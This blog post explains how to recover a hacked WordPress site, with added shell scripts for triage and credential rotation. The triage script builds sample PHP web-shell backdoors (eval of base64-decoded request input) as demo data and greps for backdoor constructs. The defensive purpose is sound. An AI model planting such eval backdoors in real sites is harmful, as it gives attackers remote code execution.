Prevention is always better than cure, but here are 10 steps to follow if your WordPress site is hacked.
1# Close your site off to the public
Preventing access to your compromised site can help protect your brand and your customers. Your hacked site might be displaying porn, distributing malware or publishing other unwanted content.
Restrict access to your site. Your hosting company can help with this, and may take the site offline themselves if they believe it has been breached.
2# Assess the damage done and investigate the cause
An understanding of how the attacker got into your site is crucial to stopping it happening again. Out-of-date plugins, themes and WordPress core may be missing security updates and can provide a route into your site. Such vulnerabilities are often well publicised, so should be fixed as soon as possible.
Look for new files, new users and new content, and review your access logs; again, ask your hosting company, who may have monitoring software. Your hosting company may prove invaluable in helping you get your site back up and in shape if you’re not tech savvy. Malware and virus protection, as well as security options such as IP restrictions for FTP access, can often be enabled via your hosting control panel.
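The following script is an added example of this triage step; it is not from the original post. It diffs the live document root against an unpacked clean backup (the same backup you would restore from in the next step), greps for constructs typical of PHP backdoors, and pulls two indicators out of an Apache combined-format access log: addresses hammering wp-login.php, and requests for PHP scripts inside wp-content/uploads, which should only ever hold media. The directory layout, file contents, IP addresses and log lines are all constructed for the demo; in practice point CLEAN, LIVE and ACCESS_LOG at your own paths.

```shell
#!/bin/sh
# Added example, not code from the original post: triage a hacked WordPress
# document root against a known-clean backup and the web server access log.
# Paths, file contents and log lines below are all constructed for the demo.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
CLEAN="$WORK/clean"            # assumed: unpacked clean backup of the site files
LIVE="$WORK/live"              # assumed: the current, compromised document root
ACCESS_LOG="$WORK/access.log"  # assumed: Apache combined-format access log

# --- constructed sample data -----------------------------------------------
mkdir -p "$CLEAN/wp-content/uploads" "$LIVE/wp-content/uploads"
printf '<?php // unchanged core file\n' > "$CLEAN/index.php"
cp "$CLEAN/index.php" "$LIVE/index.php"
printf '<?php define("DB_NAME", "wp");\n' > "$CLEAN/wp-config.php"
# The attacker appended a backdoor to wp-config.php and dropped a web shell
# into uploads/, a directory that should only ever contain media files.
printf '<?php define("DB_NAME", "wp");\neval(base64_decode($_POST["c"]));\n' > "$LIVE/wp-config.php"
printf '<?php @eval($_REQUEST["x"]);\n' > "$LIVE/wp-content/uploads/cache.php"
cat > "$ACCESS_LOG" <<'EOF'
203.0.113.9 - - [10/Oct/2014:13:55:36 +0000] "POST /wp-login.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2014:13:55:37 +0000] "POST /wp-login.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2014:13:55:38 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2014:14:01:02 +0000] "GET /index.php HTTP/1.1" 200 5678 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2014:14:01:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2014:14:02:10 +0000] "POST /wp-content/uploads/cache.php HTTP/1.1" 200 42 "-" "curl/7.35"
EOF

# --- checks -----------------------------------------------------------------
hash_file() {
  if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1" | cut -d' ' -f1
  else shasum -a 256 "$1" | cut -d' ' -f1; fi
}

# Files in the live tree that are absent from the clean backup, or whose
# contents differ from it. Usage: changed_files LIVE_DIR CLEAN_DIR
changed_files() {
  (cd "$1" && find . -type f | sort) | while IFS= read -r f; do
    if [ ! -f "$2/$f" ]; then
      echo "NEW      $f"
    elif [ "$(hash_file "$1/$f")" != "$(hash_file "$2/$f")" ]; then
      echo "MODIFIED $f"
    fi
  done
}

# PHP files using constructs typical of backdoors and web shells. A hit is a
# lead to inspect, not proof: some legitimate plugins use these too.
suspicious_php() {
  grep -rlE --include='*.php' \
    'eval[[:space:]]*\(|base64_decode[[:space:]]*\(|gzinflate[[:space:]]*\(|str_rot13[[:space:]]*\(' \
    "$1" | sort
}

# Client IPs with more than N POSTs to wp-login.php: password guessing.
# Usage: login_post_ips LOGFILE N
login_post_ips() {
  awk -v n="$2" '$6 == "\"POST" && $7 ~ /wp-login\.php/ { c[$1]++ }
                 END { for (ip in c) if (c[ip] > n) print ip, c[ip] }' "$1" | sort
}

# Requests for PHP scripts under wp-content/uploads: a strong web shell indicator.
php_in_uploads_hits() {
  awk '$7 ~ /^\/wp-content\/uploads\/.*\.php/ { print $1, $7 }' "$1" | sort -u
}

echo "== Files new or modified vs. clean backup =="; changed_files "$LIVE" "$CLEAN"
echo "== PHP files with suspicious constructs =="; suspicious_php "$LIVE"
echo "== IPs with more than 2 POSTs to wp-login.php =="; login_post_ips "$ACCESS_LOG" 2
echo "== PHP executed inside uploads/ =="; php_in_uploads_hits "$ACCESS_LOG"
```

On the sample data this reports wp-config.php as modified and uploads/cache.php as new, flags both as suspicious PHP, names 203.0.113.9 for three login POSTs, and shows that same address calling the web shell directly. The file diff is the most reliable of the four: a backdoor that is hidden in an obfuscated way will still show up as a changed hash, which is also why restoring from a clean backup is the safest way to remove code you cannot find by eye.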
3# Revert your database and files to a time before the attack
Malicious code is not always easy to find, so I’d recommend reverting to an earlier ‘clean’ backup if possible. Before you overwrite anything, keep a copy of the compromised files and database for investigation, and make sure the backup really predates the break-in, since the entry point may have been in use for some time before the symptoms appeared. The restore will take you back to a version of your site before it was compromised, complete with the security hole, which you should resolve immediately afterwards.
4# Remove any unused themes and plugins
The more themes and plugins your site has, the more potential security holes it could have. It makes sense to remove unused theme and plugin files rather than just deactivating them: a deactivated plugin’s PHP files are still reachable over the web and can still be exploited. Hackers have been known to use vulnerabilities in outdated versions of popular plugins such as the Slider Revolution plugin.
5# Apply any plugins and theme updates
Upgrade WordPress and all additional plugins/themes to the latest versions available. If you restored from a backup, do this before you reopen the site, otherwise the hole you were hacked through is still there.
6# Change the hosting Control Panel password
It’s possible that a hacker was able to discover your cPanel login, so make sure that you update your password. Use a site like Norton Identity Safe to create a secure, randomly generated password of 12+ characters.
7# Change the MySQL db connection passwords
Your MySQL database login is stored in plain text in wp-config.php, so anyone who could read your site files has it; change the password on the database server and in wp-config.php together, or the site will stop connecting. A weak database password could also have been how the hacker got in originally.
8# Change the WordPress admin password
After your website has been hacked, you have to assume the worst and change all logins to your WordPress install. Make passwords secure by using a secure password generator. Hackers often create additional admin accounts; restoring a backup taken before the break-in removes them, but check the list of administrator accounts afterwards rather than assuming it did.
Restricting access to your WordPress login page is also advised. Applying server-side Apache login protection (HTTP authentication on wp-login.php, for example via .htaccess) will also help against brute force attacks.
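Steps 6 to 8 are one credential-rotation job, so here is a single added example covering them; it is not from the original post. It generates random passwords, rewrites DB_PASSWORD and the authentication keys/salts in a constructed wp-config.php, prints the matching MySQL statements (the ALTER USER for the database account, an UPDATE to reset the WordPress admin password, and a query listing every administrator account so you can spot ones you did not create), and writes an .htaccess that limits wp-login.php to your IP behind HTTP Basic authentication. Assumptions, all placeholders: MySQL 5.7+ syntax with the database user at localhost, the default wp_ table prefix, Apache 2.4 Require syntax, the admin address 203.0.113.10 and the .htpasswd path. The cPanel password change in step 6 has no command-line equivalent and is done in the panel itself.

```shell
#!/bin/sh
# Added example, not code from the original post: rotate the secrets kept in
# wp-config.php and fence off wp-login.php. It edits a constructed
# wp-config.php in a temp dir; the database and WordPress password changes
# are printed as the SQL you would run, not executed. Assumptions: MySQL 5.7+
# (ALTER USER syntax) with the DB user at localhost, the default wp_ table
# prefix, Apache 2.4 (Require), and a placeholder admin IP and .htpasswd path.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
WP_CONFIG="$WORK/wp-config.php"
HTACCESS="$WORK/.htaccess"

# Constructed wp-config.php: the DB credentials live here in plain text, so
# anyone who could read the site files has them.
cat > "$WP_CONFIG" <<'EOF'
<?php
define('DB_NAME', 'wp_site');
define('DB_USER', 'wp_user');
define('DB_PASSWORD', 'summer2014');
define('DB_HOST', 'localhost');
define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'put your unique phrase here');
EOF

# Random password from /dev/urandom; the alphabet avoids characters that are
# special to sed, SQL string literals or the shell. Usage: gen_password [LEN]
gen_password() {
  LC_ALL=C tr -dc 'A-Za-z0-9_%+=' < /dev/urandom | head -c "${1:-24}"
}

# Read / replace the value of define('NAME', '...') in a wp-config.php.
get_define() { sed -n "s|.*define( *'$2', *'\([^']*\)' *).*|\1|p" "$1"; }
set_define() {
  sed -i.bak "s|define( *'$2', *'[^']*' *)|define('$2', '$3')|" "$1" && rm -f "$1.bak"
}

# Step 7: new DB password written into wp-config.php, with the matching
# ALTER USER for the database server printed so the two stay in step.
rotate_db_password() {
  new=$(gen_password 24)
  set_define "$1" DB_PASSWORD "$new"
  printf "ALTER USER '%s'@'localhost' IDENTIFIED BY '%s';\n" "$(get_define "$1" DB_USER)" "$new"
}

# Step 8: fresh keys and salts. Every existing WordPress login cookie,
# including any the attacker holds, becomes invalid and everyone signs in again.
rotate_salts() {
  for k in AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY \
           AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT; do
    if grep -q "'$k'" "$1"; then set_define "$1" "$k" "$(gen_password 64)"; fi
  done
}

# Step 8: admin password reset via SQL. WordPress accepts an MD5 hash in
# user_pass and re-hashes it with its own scheme at the next successful login.
admin_password_sql() {  # Usage: admin_password_sql USER_LOGIN
  printf "UPDATE wp_users SET user_pass = MD5('%s') WHERE user_login = '%s';\n" "$(gen_password 24)" "$1"
}

# Every account holding the administrator role: compare against who should have it.
list_admins_sql() {
  printf "%s\n" "SELECT u.ID, u.user_login, u.user_email FROM wp_users u" \
    "JOIN wp_usermeta m ON m.user_id = u.ID" \
    "WHERE m.meta_key = 'wp_capabilities' AND m.meta_value LIKE '%administrator%';"
}

# Apache 2.4 .htaccess: wp-login.php answers only to the listed IP(s) and only
# after HTTP Basic auth, so brute force is absorbed before WordPress sees it.
# Usage: write_login_htaccess OUT_FILE ADMIN_IP HTPASSWD_PATH
write_login_htaccess() {
  cat > "$1" <<EOF
<Files "wp-login.php">
    AuthType Basic
    AuthName "Restricted"
    AuthUserFile $3
    <RequireAll>
        Require valid-user
        Require ip $2
    </RequireAll>
</Files>
EOF
}

echo "-- run in MySQL --"
rotate_db_password "$WP_CONFIG"
admin_password_sql admin
list_admins_sql
rotate_salts "$WP_CONFIG"
write_login_htaccess "$HTACCESS" 203.0.113.10 /home/example/.htpasswd
echo "-- rotated wp-config.php --"; cat "$WP_CONFIG"
echo "-- $HTACCESS --"; cat "$HTACCESS"
```

Create the .htpasswd with the htpasswd tool that ships with Apache, and keep it outside the document root. The same RequireAll block placed at the top of the site’s .htaccess, outside the Files section, closes the whole site to everyone except your own address while you clean up, which is the lockdown described in step 1.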
9# Install a WP security plugin
Security plugins such as WordFence can help you to recover your site from an attack and prevent your site from being compromised again.
You can:
- compare your plugin, theme and core files against the official repository copies, to find available updates and altered or potentially malicious files
- track/block access to your site
- enable a firewall
Here are a few more security tips from an earlier blog post, ‘Cyber security for small businesses’.
10# Stay aware, sign up to security newsletters
WordFence also has a great newsletter that can let you know about exploits of popular WP plugins. Learning about the release of a security patch or a plugin vulnerability early could save you the headache of having to undo the work of a hacker.